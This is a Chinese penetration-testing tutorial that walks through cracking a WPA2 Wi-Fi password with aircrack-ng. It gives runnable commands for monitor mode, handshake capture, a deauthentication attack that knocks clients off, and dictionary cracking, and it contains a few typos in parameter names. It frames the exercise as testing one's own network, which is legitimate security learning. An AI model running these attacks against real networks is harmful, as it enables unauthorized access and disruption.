渗透利器-kali工具 (第八章-1) Wifi密码破解案例

本文内容:

  • Aircrack-ng简介
  • WIFI破解配置要求
  • WIFI破解的流程
  • 扩展思路如何继续渗透测试

 

1,Aircrack-ng简介:

  Aircrack-ng是一个与802.11标准[无线网络标准]的无线网络分析有关的安全软件,主要功能:网络侦测,数据包嗅探,WEB和WPA/WPA2-PS破解。

  Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。

  可以在Linux和Windows上运行。

  开源项目:https://github.com/aircrack-ng/aircrack-ng

  官网:https://www.aircrack-ng.org/

  官方指南:https://www.aircrack-ng.org/doku.php

  教程:https://www.aircrack-ng.org/~~V/doku.php?id=tutorial

  aircrack-ng套件包含有:

    aircrack-ng     破解wep以及wpa[字典攻击]秘钥

    airdecap-ng    通过已知秘钥来解密web或wpa嗅探数据

    airmon-ng      将网卡设置为监听模式

    aireplay-ng     数据包嗅探:将无线网络数据输送到PCAP货IVS文件并显示网络信息

    airtun-ng        创建虚拟管道

    airolib-ng        保存、管理ESSID密码列表

2,WIFI破解配置要求:

  1.自建WIFI进行测试。

  2.外置网卡设备[RT3070]:可以自己买个,不需要多好十几块钱就可以。

  3.信号稳定

3,WIFI破解的流程:

  Aircrak-ng破解WAP2-PSK:

  1.查看网卡设备:

    命令:ifconfig / iwconfig

  2.查看是否支持监听模式:

    命令:airmon-ng

  3.开启无线网卡监控模式

    命令:airmon-ng start wlan()    通过查看,wlan0多了一个mon,证明开启成功

  4.查看周围WIFI网络:

    命令:airodump-ng wlan0mon

  5.监听目标网络的握手包:

    命令:airodump-ng -c 11 --bassid 2C:57:31:60:27:E6 -w ~/1/ wlan0mon 

    参数解释:ESSID:为WIFI名字。

      -c 指定频道[信道]号 CH:信道

      -bassid 指定路由器bassid MAC地址

      -w 指定抓取的数据包保存位置  1:文件名

      wlan0mon 开启

    如果没有[WPA handshake:MAC地址],就可以强制让它断开,重新连接,看是否能抓到数据包

  6.强制对方WIFI断开重连[获取握手包]

    命令:aireplay-ng -0 2 -a 2C:57:31:60:27:E6 -c 60:AB:67:F2:F5:A8 wlan0mon

    参数解释:

      -0 表示发起[鉴权] deauthentication攻击 2 为鉴权等级。

      -a 指定无线路由器[开启wifi设备的MAC地址]BSSID

      -c 指定强制断开的设备[链接wifi设备的MAC地址]

      wlan0mon 开启

  7.破解握手包密码: 

    命令:aircrack-ng -a2 -b 52:8F:4C:67:B1:91 -w pass.txt ~/1/*.cap 

    参数解释:

      -a2     代表WPA的握手包

      -b       指定要破解的WIFI[MAC地址] BSSID

      -w      指定字典文件

  8.关闭监听模式:

    命令:airmon-ng stop wlan0mon

    破解密码链接之前要关闭监听模式

4,扩展思路如何继续渗透测试:

  WIFI密码后的扩展思路:

  想想我们的渗透测试思路:

    1.信息收集

    2.漏洞扫描

    3.漏洞利用 

    4.获取权限

    5.权限维持

    6.整理思路

你可能感兴趣的:(渗透利器-kali工具 (第八章-1) Wifi密码破解案例)